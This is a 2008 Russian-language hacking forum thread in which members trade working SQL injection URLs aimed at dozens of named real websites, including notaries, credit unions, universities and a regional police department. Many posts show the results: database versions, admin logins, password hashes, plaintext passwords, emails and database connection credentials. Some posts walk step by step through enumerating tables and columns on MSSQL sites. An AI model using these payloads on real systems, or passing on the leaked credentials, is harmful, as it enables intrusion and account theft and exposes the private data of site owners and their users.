http://www.notary.ru/notary/notary.php?chamberid=022&id=999999999'/**/UNION/**/SELECT/**/1,2,version(),4,user,6,7,8,9,10,11,12,13,14,15+fro m+mysql.user/*
2c5256dd67328e7d:notary
Крымский Финансовый Портал
http://www.kfp.com.ua/notarius_full.php?id=99999999999+UNION+SELECT+all+ 1,pass,3,4,5,6+from+users/*
ПроводкаРу
http://provodka.ru/publication.php?id=9999999999+UNION+SELECT+concat_ ws(0x3a,user_name,user_password)+from+compet_users +limit+1,1/*
admin:21232f297a57a5a743894a0e4a801fc3
CU/America Financial Services-
Home Loans - Credit Union - Lombard
http://www.cuamerica.com/main.php?page_id=999999999999999'/**/UNION/**/SELECT/**/1,2,3,0x3a,password,6,7,8,9+from+mysql.user/*
63457fd127556365

ниче личного ;)

еще
UNITED BAKERS
http://www.unitedbakers.ru/print.php?section_id=115&id=9999999999999/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10,11/*
Вознесенская Горка
http://vgor.ru/inner.php?page=conditer&top=9999999999999/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11/*
INFORMARKET: готовые маркетинговые исследования и обзоры рынка, заказ и поиск исследований, отраслевые обзоры, новости.
ViP рецепты - Сайт вскусной пищи
http://viprecipes.org.ua/index.php?action=recipe&recipeID=1170&CID=9999999999999/**/UNION/**/SELECT/**/1,2,version(),4,5,6/*
http://www.informarket.ru/index.php?id_o=9999999999999/**/UNION/**/SELECT/**/version()/*
Самарский государственный педагогическйи университет
http://www.sgpu.info/page.php?id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15/*
Обучение за рубежом. Образование за рубежом.
http://www.intelstudy.ru/c_topics.php?so=showtopic&ct_id=9999999999999/**/UNION/**/SELECT/**/unhex(hex(version())),2,3/*

jokester, ok учту, выложил на свой взгяд самое интересное из того что есть. И не ругайтесь :)
я не выпендриваюсь(собственно и нечем),просто хочу народу помочь,авось пригодится кому.

Jokester

12.04.2008, 23:48

bag
Круто конечно,"антибоян не пашет вывалю всё в кучу"
В твоём посте 18 боянов проверяется элементарно : гугл
твой_линк site:forum.antichat.ru и антибоян не особо нужен

cash$$$

13.04.2008, 01:17

http://www.calbank.net/newsite/products&services/index.php?id=99999+union+select+1,2,VERSION(),4,5, 6,7,8,9/*

VERSION: 4.1.22-standard-log
USER: 334937_alfred@172.16.10.1
DATABASE: 334937_calcms

http://www.gladstone.mo.us/events.php?id=99999+union+select+1,2,3,VERSION()/*

VERSION: 5.0.45
USER: root@localhost
DATABASE: tophat

http://www.lgcommercial.com/product.php?id=99999+union+select+1,2,3,4,5,6,VERS ION(),8,9,10,11,12,13,14,15,16,17,18,19,20/*

VERSION: 4.0.27-standard-log
USER: jkuser_lgdbuser@localhost
DATABASE: jkuser_lgcommercial

Ponchik

13.04.2008, 06:34

_http://www.rabota.md/vacancies/vacancyCategory.php?id=-1+UNION+SELECT+concat_ws(0x3a,VERSION(),USER(),DAT ABASE())/*
5.0.45:coruptie@localhost:coruptie_rabota
Ну 5 версия с таблами сами разберётесь :)

truelamer

13.04.2008, 12:52

http://www.finbook.biz/description.html?prm=-1++union+select+1,2,3,concat(user(),char(58),datab ase(),char(58),version()),5,6,7,8,9,10,11,12,13,14 ,15,16,17,18/*

finbook_user@localhost
finbook_biz
4.1.22-standard-log

bag

13.04.2008, 17:21

NISPAcee - The Network of Institutes and Schools of Public Administration in Central and Eastern Europe
http://www.nispa.sk/_portal/conf_program.php?cid=9999999999999/**/UNION/**/SELECT/**/1/*

The Washington Institute for Near East Policy
http://www.washingtoninstitute.org/templateC04.php?CID=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49/*

-=megahertz=-

13.04.2008, 21:52

Центр информационных технологий

http://itex.ru/po/sale/?pid=-4+union+select+1/*
user - itex@cub.mplik.ru
database - itex
version - 5.0.41-log

Интересные таблицы :)
amarant_users
analitika_hackers
analitika_users
apm_admin
apm_hackers
asbest_users
atmosphere_admin

truelamer

14.04.2008, 07:52

http://www.bamba.ru/product.asp?view=56634+or+1=(select+system_user)

http://www.bamba.ru/product.asp?view=56634+or+1=(select+db_name())

http://www.bamba.ru/product.asp?view=56634+or+1=@@version

bd_user: frontcontent

bd_name:bamba

http://www.bamba.ru/product.asp?view=56634+or+1=@@version

version:
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

-----------------------

http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+table_na me+from+information_schema.tables+where+table_name +not+in+('GROUP_MEMBERSHIP','GROUP_RIGHTS','CONTEN T_5','CONTENT_26','CONTENT_20','SITE','main_catalo g','SYSTEM_VARS','USER_RIGHTS','CONTENT_TYPE','PAG E','ATTRIBUTE_GROUP','ATTRIBUTE_TYPE','BACKEND_SEC TION','catalog','CONTAINER','CONTAINER_TYPE','CONT ENT','CONTENT_1','CONTENT_10','CONTENT_11','CONTEN T_12','CONTENT_13','CONTENT_14','CONTENT_15','CONT ENT_16','CONTENT_17','CONTENT_18','CONTENT_19','CO NTENT_2','CONTENT_21','CONTENT_22','CONTENT_23','C ONTENT_24','CONTENT_3','CONTENT_4','CONTENT_6','CO NTENT_7','CONTENT_8','CONTENT_9','CONTENT_ATTRIBUT E','CONTENT_DATA','CONTENT_LINK','CONTENT_STATUS', 'CONTENT_TYPE_GROUP','CONTENT_TYPE_LINK','DB_VERSI ON','dtproperties','FORMAT','GROUP_ROLE','LANGUAGE ','MEMBER','MEMBER_CONTENT','OBJECT','ROLE','ROLE_ RIGHTS','SITE_LANG','SITE_SECTIONS','sysconstraint s','syssegments','SYSTEM_VARS_GROUP','t_jiaozhu',' TEMPLATE','UNIT','UNIT_SETTING','USER_GROUP','USER _ROLE'))

получаем таблицу 'USERS'
--------------------------------------
Получаем структуру таблицы users

http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+column_n ame+from+information_schema.columns+where+table_na me='USERS'+and+column_name+not+in+('created','disa bled','full_name','login','modified','password','s ite_id'))

---------------------------------------

http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users)--

login:MNBorisow
password:ma3569

-------------------------
http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users+where+login+not+in+('MNBorisow') )--

login:DVStebunov
pass:12345678

----------------------------------------------------
http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users+where+login+not+in+('MNBorisow', 'DVStebunov'))--

login:yy
pass:moscow1

------------------------------------------------------
http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users+where+login+not+in+('MNBorisow', 'DVStebunov','yy'))--

login:GLazukin
pass:GP97sl

И.Т.Д.

neon_fx

14.04.2008, 18:05

http://nce.iatp.org.ua/index.php?action=events&show=events&id=8+UNION+SELECT+1,2,3,4,5,6,concat_ws(char(58),v ersion(),user(),database())+LIMIT+1,1/*
4.1.22
nce@hosting.iatp.org.ua
nce

-=megahertz=-

14.04.2008, 22:53

Серверное и сетевое оборудование
http://okta.ru/articles/?id=-1204722526+UNION+SELECT+1,concat(user(),0x3a,versi on(),0x3a,database()),3/*
user - okta_admin@localhost
version - 4.0.24_Debian-10sarge2-log
database - okta_admin

Ch3ck

14.04.2008, 23:18

стомотология...
http://www.ctoma.ru/services.phtml?id=-142+union+select+concat(version(),char(58),databas e(),char(58),user())/* (см. в <title>5.0.41-log:ctoma:ctoma@localhost)

RuDDicK

15.04.2008, 09:28

sql inject на дамском клубе
http://www.tdktv.ru/index.php?menu=program&id=- 1+union+select+1,concat(username,char(58),user_pas sword),3+from+phpbb_users+limi
t+1,2
вот данные для коннекта к БД

"dblogin" => "tdktvru_user"
"dbpass" => "markus25let"
"dbhost" => "mysql.nthost.ru"
"dbname" => "tdktvru_common"

RuDDicK

15.04.2008, 09:35

sql-injection на Департаменте вн.дел Каз. области
http://kostanaypolice.kz/index.php?id=-1)+union+select+1,user(),3+from+relise/*

Велемир

15.04.2008, 16:40

Таблыцы:

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+table_name+fro m+information_schema.tables+where+table_name+not+i n('MODELS','NEWSLETTER','PAGE_groups','pages','pay ment','address','assets','assets_type','brands','c art','cartitems','category','connector_key','conne ctors','connectors_b3','connectors_b6','connectors _choir','connectors_e6','connectors_emw','connecto rs_headset','connectors_isomax2','contactus','down loads','items','pdfs','pdftoproducts','preferences ','PREFERENCES_SECURE_STYLES','PREFERENCES_SHIPPIN G','PREFtoSHIP_SERVICES','PREFtoSHIP_VENDORS','pri ces','PRODtoCAT','products','promo_codes','SHIPPIN G_SERVICES','SHIPPING_VENDORS','sysconstraints','s yssegments','))--&catid=

ПАЛЯ :Р

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+column_name+fr om+information_schema.columns+where+table_name='us ers'+and+column_name+not+in('Active','Admin','Bill ingAddressID','CompanyName','EndDate','Name','Pass word','PrefID','ShippingAddressID','TheDate','User ID','UserName'))--

Бес понятия, боян или нет, но вот.

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+cast(UserID+as +nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar )%2B%27%3A%27%2Bcast(Admin+as+nvarchar)%2B%27%3A%2 7%2Bcast(name+as+nvarchar)+from+users+where+UserID =1)--v

Остальное влом :Р, спасибо Анатолию за стотью:-Р

RuDDicK

15.04.2008, 17:02

Бес понятия, боян или нет, но вот.

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+cast(UserID+as +nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar )%2B%27%3A%27%2Bcast(Admin+as+nvarchar)%2B%27%3A%2 7%2Bcast(name+as+nvarchar)+from+users+where+UserID =1)--v

Остальное влом :Р, спасибо Анатолию за стотью:-Р[/QUOTE]
http://www.countryman.com/store/product.asp?id=1+or+1
тот же самый результат

Велемир

15.04.2008, 19:05

Бес понятия, боян или нет, но вот.

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+cast(UserID+as +nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar )%2B%27%3A%27%2Bcast(Admin+as+nvarchar)%2B%27%3A%2 7%2Bcast(name+as+nvarchar)+from+users+where+UserID =1)--v

Остальное влом :Р, спасибо Анатолию за стотью:-Р
http://www.countryman.com/store/product.asp?id=1+or+1
тот же самый результат[/QUOTE]

Ну звиняй, ссылки на антибоян нету (

ZET36

15.04.2008, 22:07

http://www.novistil.ru/index.php?option=com_zilchcatalog&task=view&id=-3+union+select+1,user(),3,4,5,6,7,8/*
извените если боян

lamko

15.04.2008, 23:17

http://veta.ru/index.php?act=bench&index=-1+union+select+1,version(),3,user(),5,6/*

MySQL- 4.1.22
user - veta@localhost
db - wwwvetaru

пардон если баян :)

Sleep

16.04.2008, 07:05

http://www.mastercity.ru/arch/show_content.php?id=74'+union+select+1,2,3,id,5,6, 7,8+from+user/*
http://valdis.net.ru/add.php?id=-74+union+select+version(),2,3,4,user(),6,7/*

Extremal

16.04.2008, 12:26

Сайт города Воронеж
http://www.voronezh.ru/cgi-bin/tv_progr/tv.pl?N&DAY=-5/**/union/**/select/**/1,2,3,concat_ws(char(58),user,password)/**/from/**/mysql.user/*
root : 27f00fce61a0d154
P.S:В антибояне ненашел.

иц май

16.04.2008, 13:15

Московский Американский центр
http://www.amc.ru/?section=about&sub=1&newsid=-1+union+select+1,2,3,4,5,6,7,concat(name,0x3a,pass word),9,10,11,12,13,14,15+from+person/*
Админка: /admin/ правда там басик авторизация =/

bag

16.04.2008, 21:35

Официальный сайт ФК ХИМКИ
http://www.fc-khimki.ru/modules/news/index.php?current_id=1&news_id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
Экспресс К - ежедневная общественно-политическая республиканская газета
http://www.express-k.kz/show_article.php?art_id=9999999999999/**/UNION/**/SELECT/**/1/*
АРХИТЕКТУРНОЕ ПРОЕКТИРОВАНИЕ & ДИЗАЙН ИНТЕРЬЕРА от студии De-Viz :: Проекты дизайна интерьеров проекты домов
http://www.de-viz.ru/articles_view.php?articles_id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4/*
67457e226a1a15bd:root
6f38971106105e69:mysqladmin
10207c3022bdb716:asiadmin
Ислам в Российской Федерации - информационно-аналитический портал
http://www.islamrf.ru/articles.php?razdel=1&sid=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9/*
Islambasics
http://islambasics.com/view.php?bkID=9999999999999/**/UNION/**/SELECT/**/1,2/*

Sify.com - India News Portal, Indian Business
http://sify.com/news/fullstory.php?id=9999999999999+UNION+SELECT+1,2,3/*

موقع الإسلام سؤال وجواب
http://www.islamqa.com/ln/php/the_file.php?ln=9999999999999'+UNION+SELECT+1,2/*
Всо о Сербии
http://www.srpska.ru/article.php?nid=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13/*
Islam Videos
http://www.watchislam.com/videos/index.php?catid=9999999999999/**/UNION/**/SELECT/**/1/*
Скачать реферат Бесплатные рефераты.
http://www.referatnik.net/index.php?action=referat&referat=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/*
НОУ "Институт проблем предпринимательства"
http://www.ippnou.ru/article.php?idarticle=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5/*
БЕЛТИМ - Комплексные системы защиты информации
http://www.beltim.by/ru/catalog/index.php?catalogid=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

http://moresofta.ru/soft.php?n=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11/*
http://kupi-soft.ru/soft/s1.php?km=2038342808&np=129&l=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

ИТ-решения - Доверенные системы
http://www.trusted-systems.ru/seminars.php?act=news_by_id&news_id=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*

MaSter GeN

17.04.2008, 12:22

http://www.kinogildia.ru/pages/page.php?page=-63 union select 1,version(),3,user(),5,6,7,8,9/*
ver4.1.22
user:kinogild@fe1.hc.ru
http://www.stalkerfest.org/page.php?page=-149 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,15/*
ver=4.1.22
http://www.americanvegetablegrower.com/veggie_bytes/page.php?page=-news'+union+select+1,2,3,user(),database(),version (),7,8,9/*
user:dbuser@localhost
ver:5.0.24
db:avg_blog

CaNNabi$

17.04.2008, 22:37

http://www.mel-trans.com/
http://www.mel-trans.com/index.php?pid=0x2d3127%20union+select+1,concat_ws( 0x2F,version(),database(),user())/*
4.1.22/meltrans_prom/meltrans_mel@localhost

http://www.megatherm.gr/
http://www.megatherm.gr/index.php?id=new&new=-1'%20UNION%20ALL%20SELECT%201,2,concat(database(), char(58),user(),char(58),version()),concat(usernam e,0x3e,password),5,6,7,8,9+from+admins/*
megatherm:sfond@localhost:4.1.20

http://portal.kurkino.net.ru/
http://portal.kurkino.net.ru/portal.php?module=news&view_gid=0x3127%20union+select+1,2,3,4,concat_ws(0 x3a,user,password),6,7,8%20from%20mysql.user/*
root:*5BF54E8CE07B306EE23D5FAF3BEF377843EE65D3 ---> root:*5BF54 E8CE07B306EE23D5FAF3BEF377843EE65D3::12122:

http://hotscriptsonline.com/
http://hotscriptsonline.com/showcategory.php?cid=0x2d3127%20union+select+1,2,3 ,4,5/*
4.1.22-standard/clubgcom_espacio/clubgcom_admin@localhost(

bag
ppnou.ru - БОЯН
de-viz.ru - БОЯН
И не надо пожалуйста трогать религиозные сайты.

Against-C*

17.04.2008, 23:51

_http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805'
3 столбца там вроде
Помогите плз раскрутить...

ZET36

18.04.2008, 00:15

_http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805'
3 столбца там вроде
Помогите плз раскрутить...

хы странно вроде order by проверяю количество полей 9

http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805+order+by+9/*
http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805+order+by+10/*

а при http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805+union+select+1,2,3,4,5,6,7,8,9/* ошибка

gibson

18.04.2008, 00:15

_http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805'
3 столбца там вроде
Помогите плз раскрутить...

версия мускула предположительно == 4
табл 1
посимвольный брут нужен

Jokester

18.04.2008, 00:21

gibson,ZET36
3 ветка union не пашет отсюда и ошибка
_http://www.mioo.ru/podrazdinfpage.php?id=116&prjid=805+and+substring(version(),1,1)=3/*
А вообще вопросы-соседняя тема

bag

18.04.2008, 01:40

Йога: кундалини йога, хатха йога, трай йога, медитации, йога для детей, беременных, асана, чакры, мантры

http://www.kundalini.ru/parts.php?id=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4/*

Ниче личного, господа. Просто скуля,а то народ иногда возмущается что мол затрагиваю....

http://www.bikenut.com.au/parts.php?id=9999999999999/**/UNION/**/SELECT/**/1/*

тот же stox CMS, есть таблица users, дальше не смотрел

============================
Журнал "Наука и религия" Официальный сайт
http://www.n-i-r.ru/nir3.php?id_pdstat=999999999+UNION+SELECT+1,versio n(),3,4,5/*

http://melitopol.ru/mel/is.php?n_is=9999999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
5.0.45-Max-log

http://www.immi-ru.net/serv/news.php?news=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21/*

Extremal

18.04.2008, 13:14

to bag

http://www.immi-ru.net/serv/news.php?news=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21/*

http://www.immi-ru.net/serv/news.php?news=9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(char(58),name,username,passwor d,email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 +from+users2+limit+0,1/*
Помойму вот так намного лудше ;) Пассы храняться в открытом виде :)
Старайтесь раскрутить полностью инъекцию а не только подбирать колнки.

bag

18.04.2008, 17:38

Межшкольный Эстетический Центр
http://www.mec-krasnodar.ru/content.php?id=999999999'/**/UNION/**/SELECT/**/1/*
photoisland
http://www.photoisland.net/pi_art_text.php?lng=1&article_id=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6/*
Компания GFI разработчик игр
http://www.gfi.su/index1.php?langid=1&idt=999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
Психологический навигатор
http://www.psynavigator.ru/articles.php?code=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9/*
версия бд - 5

Медицинское оборудование
http://diamedcom.ru/php/content.php?group=1&id=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24/*
Formul.Ru Итальянская мебель,кухни из Италии, кровати, гостиные, спальни,кухонные мойки, матрасы
http://www.formul.ru/privacy.php?n=999999999'/**/UNION/**/SELECT/**/1,2,3,4/*
Доски объявлений. Бесплатная доска объявлений
http://www.1000dosok.ru/doski.php?kr=999999999'/**/UNION/**/SELECT/**/1/*

Производство и продажа шкафов купе, заказ прихожих, гардеробных и обувниц
http://www.s-m-c.ru/about/index.php?idmenu=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/*
ООО "Форпост" - продажа мебели оптом и в розницу
http://www.forpost-perm.ru/spec.php?action=detail&id=999999999/**/UNION/**/SELECT/**/1/*
mebelshop.kiev.ua | магазин мебели
http://mebelshop.com.ua/index_office.php?param=38&chair_marka=999999999/**/UNION/**/SELECT/**/1,2,3/*
мебель для кухни
http://www.mebelhall.ru/gallery.php?menu=kux&foto=999999999'/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*
Мебель: стулья, столы, журнальные столики, кресла, диваны
http://anymebel.ru/index.php?shops=999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*
Мебель на любой вкус
http://mebel-miheeff.ru/catalog.php?cat=999999999/**/UNION/**/SELECT/**/1/*

со скулями ухожу в бессрочный отпуск)))

RuDDicK, боян это када выложенная тобой тема уже выкладывалась или обсуждалась и ты ее повторяешь.

-=megahertz=-

18.04.2008, 18:13

to bag
Старайтесь раскрутить полностью инъекцию а не только подбирать колнки.
без проблем:

truelamer

18.04.2008, 21:33

http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=@@version--

Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.0 (Build 2195: Service Pack 4

http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=system_user--

generaluser

http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=db_name()--

preview_kccla

http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=(select+top+1+ta ble_name+from+information_schema.tables)--

http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=(select+top+1+ta ble_name+from+information_schema.tables+where+tabl e_name+not+in+('STATUS','Admin','Admin_Login','Adm in_Login_Level'))--

http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='Admin'+and+column_name+not+in+('AID','Pa ssword'))--

http://www.kccla.org/html/exhibition_detail.asp?ID=87+and+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='Admin_Login'+and+column_name+not+in+('ID ','AdminID','Login','IP','Date_Time'))--

Криважопая база, складывается такое впечатление что данные находятся не в своих столбцах
так например в id хранятся мылы и то не с первой записи, а первая пуста. И логины вроде в AdminID короче что попало(

это логины один какой-то подходит к пасу ниже

logins:
adminweb
adminkcc
adminpat
pat4896

id:josh@kccla.org
pass:choi1979

reversys

19.04.2008, 00:31

http://www.photoshopchop.com/tutorials/viewcat.php?id=10/**/union/**/select/*%20*/null,user(),concat(username,0x3e,password),null,nu ll,database(),null,%20null,null/**/from/**/admin/**/LIMIT/**/139,1/*

http://www.tutorial-s.com/viewcat.php?id=4/**/union/**/select/*%20*/null,user(),concat(username,0x3e,password),null,nu ll,database(),null,%20null,null/**/from/**/admin/**/LIMIT/**/4985,1/*

http://readtutorials.com/viewcat.php?id=184/**/union/**/select/*%20*/null,user(),concat(username,0x3e,password),null,nu ll,database(),null,%20null,null/**/from/**/admin/**/LIMIT/**/4111,1/*

http://www.capitaltutorials.com/viewcat.php?id=7/**/union/**/select/*%20*/null,user(),concat(username,0x3e,password),null,nu ll,database(),null,%20null,null/**/from/**/admin/**/LIMIT/**/1171,1/*

CraZee

19.04.2008, 16:23

От меня немножко уязвимостей в Joomla:

http://4web.ws/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.maybach-manufaktur.ru/news/?id=-9+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+maybach_users/*
http://www.el-edu.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*

Momiji

19.04.2008, 17:24

lmsports.ru
http://www.lmsports.ru/forum.html?page=&show=&msgid=-1+union+select+concat_ws(0x3,version(),user(),data base())/*
5.0.45-logu81617@10.10.223.245u81617
http://www.lmsports.ru/forum.html?page=&show=&msgid=-1+union+select+concat_ws(0x3,email,pass)+from+mail list+limit+0,1/*
turtle@liquimoly.ruoBJsHzBk

big_BRAT

19.04.2008, 17:53

http://www.vmprotect.ru
продавцы хорошего протэктора.

http://www.vmprotect.ru/news.php?id=389+UnIOn+SelEct+1,2,3,concat_ws(0x3a, version(),user(),database()),5/*
5.0.45-community-nt-log:1gb_vmprotect@81.176.226.164:1gb_vmprotect

http://www.vmprotect.ru/news.php?id=389+UnIOn+SelEct+1,2,3,concat_ws(0x3a, username,user_password),5+from+phpbb_users+limit+1 ,1/*
Admin:7fbab0f8d4e73b606eb88383e22b72bc

=======================
есть форум phpbb, интересная таблица vmprot_clients

.acme

19.04.2008, 23:59

kiberpank.ru
Сказка на ночь: Как поимели "киберпанков". Оказалось все банально.

http://kiberpank.ru/forumtopics/-99999+union+select+1,2,3,4,5,concat_ws(0x40,TABLE_ NAME,COLUMN_NAME),7,8,9,10+from+INFORMATION_SCHEMA .COLUMNS--

user: u46687@10.10.223.241
database: u46687_kiberpank
version: 5.0.45-log

Смотрим юзверей:

http://kiberpank.ru/forumtopics/-99999+union+select+1,2,3,4,5,concat_ws(0x3,id,nick ,password,email,icq),7,8,9,10+from+users+limit+1,5 0--

Enjoy.

vp$

20.04.2008, 00:23

МГТУ им Н.Э.Баумана
научно-учебный центр "роботехника"
http://www.robot.bmstu.ru/index.php?c=flud&n=467600000+union+select+1,2,3,concat(name,0x3a,ha sh,0x3a,status),5+from+peoples/*
Акилин Андрей Алексеевич:5fa63f31b9b7c2a6769abc8c21a93 a09:1 пасс 1119862833
а куда вставлять хз, есть форма входа
_http://www.robot.bmstu.ru/kaf_test/
но тут нужен логин, которого в табле нет((
17:archive
17:--1:dt
17:--2:text
17:--3:user
17:--4:status
17:--5:coment
18:board
18:--1:data
18:--2:name
18:--3:mail
18:--4:content
18:--5:status
18:--6:hash
19:club
19:--1:content
20:fluders
20:--1:ip
20:--2:host
20:--3:fluder
20:--4:message
21:materials
21:--1:discipline
21:--2:matname
21:--3:prepod
21:--4:link
22:news
22:--1:data
22:--2:title
22:--3:content
23:pages
23:--1:codename
23:--2:description
23:--3:owner
24:peoples
24:--1:data
24:--2:name
24:--3:mail
24:--4:content
24:--5:status
24:--6:hash
25:prepod
25:--1:name
25:--2:description
25:--3:login
25:--4:pass
25:--5:status
26:sessions
26:--1:login
26:--2:type
27:subpage
27:--1:codename
27:--2:content

CaNNabi$

20.04.2008, 18:41

http://www.taboschar.net/
http://www.taboschar.net/AllMyGuests/index.php?AMG_open=comments&AMG_id=null+UNION+SELECT+1,2,3,concat_ws(0x203a20, user_name,user_password,user_email),5,6,7+from+all myphp_user+where+user_id=1--
Admin:3d89b9b8a6d81b112d4dc41d11ee5375:info@tabosc har.net

beerhack

20.04.2008, 23:19

http://www.thefump.com/lyrics.php?id=-99999+union+select+1,2,3,4,id,6,7,8,9,10,concat_ws (0x3a,username,password,email),12,13+from+users/*

USER: root@localhost
VERSION: 5.0.27-standard
DATABASE: thefump_com_-_fump

всё как на ладоне)

Xszz

21.04.2008, 01:09

http://www.utinam.fr/english/boutique/index.php?FAM_ID=2&RUB_ID=-6+UNION+SELECT+1,2,concat(user,char(58),password), 4,5,6,7,8+FROM+mysql.user/*

root:admin

Tyc00n

21.04.2008, 13:33

http://l2world.uz/dp/m-search.php?itemname=&monsterid=25009'
Гляньте ,может можно раскрутить ?

Спайдер

21.04.2008, 15:48

http://ataman-kpc.ru/?art_id=-8+union+select+1,2,version(),4,5,6,7,8

159932

21.04.2008, 16:03

http://ataman-kpc.ru/?art_id=-8+union+select+1,2,version(),4,5,6,7,8
------------------------------------------------------------------------------------------
http://ataman-kpc.ru/?art_id=-8+union+select+1,2,3,concat_ws(0x3a,id,name,usr,pw d),5,6,7,8+from+adm_users
ataman:225ata90man_16

-=megahertz=-

21.04.2008, 18:03

Интернет телевидение
http://tv-portal.ru/index.php?kanal=-57+UNION+SELECT+1,2,concat(id,0x3a,name,0x3a,pass) ,database(),5,user(),7,8,9,10,version()+from+users +limit+1,1/*
database - dbu_kokos32_1@192.168.3.23
user - db_kokos32_2
version - 4.1.21-log

меняем limit+1(2,3,4...),1/* получаем ИД,Имя,Пароль

NFM

21.04.2008, 20:03

2-=megahertz=- только хз куда эти логины и пассы= )
там авторизаций ничего нету =) а в админку пассы не подходят

-=megahertz=-

21.04.2008, 20:48

NFm попробуй подбери другую таблицу... я кроме юзерс ничего не искал...

kair

21.04.2008, 22:34

ht_tp://uskniedernsill.us.funpic.de/AllMyGuests0.4.1/index.php?AMG_open=comments&AMG_id=111%20UNION+SELECT+1,2,3,%20concat_ws(0x203 a20,user_name,user_password,user_email),5,6,7+from +allmyphp_user+where+user_id=1--
stefanhofer : e8cd3fd55a1f0100bb692431c649844c :fc_niedernsill@yahoo.de
Пробую вскрыть хэш!!!

AkyHa_MaTaTa

22.04.2008, 04:23

http://rwjcsp.yale.edu/community.php?id=123123123+union+select+1,concat_w s(0x2f,version(),database(),user()),3,4,5,6,7,8,9, 10,11,12,13,14,15,id,17,18,20,21,22,23,24,25+from+ users+limit+1,1/*
version() : 4.0.24-log database():rwj user(): rwjEditor@web.med.yale.edu

http://rwjcsp.yale.edu/community.php?id=123123123+union+select+1,password ,3,4,5,6,7,8,9,10,11,12,13,14,15,id,17,18,20,21,22 ,23,24,25+from+users+limit+1,1/*

http://www.moscowbooks.ru/news/view.asp?id=-1+or+1=@@version--

gibson

22.04.2008, 12:18

http://www.preproject.com/news%20manager/admin/view_news.php?catid=[sql]

